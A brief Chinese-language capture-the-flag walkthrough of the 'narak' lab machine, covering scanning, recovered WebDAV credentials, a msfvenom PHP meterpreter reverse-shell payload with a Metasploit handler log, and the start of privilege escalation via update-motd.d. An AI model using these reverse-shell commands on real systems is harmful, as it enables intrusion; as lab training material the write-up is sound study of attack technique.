narak¶
拿shell¶
信息收集¶
先拿nmap扫
Wappalyzer
dirb
发现tips.txt
和http://192.168.10.157/webdav/
查看 tips.txt
Hint to open the door of narak can be found in creds.txt.
找不到creds.txt
再用UDP扫描一遍
发现开着68,69
拿到yamdoot:Swarg
可以登录到http://192.168.10.157/webdav/
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.10.241 LPORT=5820 -f raw > shell.php
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp
payload => php/meterpreter_reverse_tcp
msf5 exploit(multi/handler) > set LPORT 5820
LPORT => 5820
msf5 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 0.0.0.0:5820
[*] Meterpreter session 1 opened (192.168.10.241:5820 -> 192.168.10.157:38638) at 2020-10-04 15:39:27 +0800
meterpreter >
提权¶
获取到www-data
权限惹
update-motd.d
当使用 telnet 连接主机时,主机的登入画面就会显示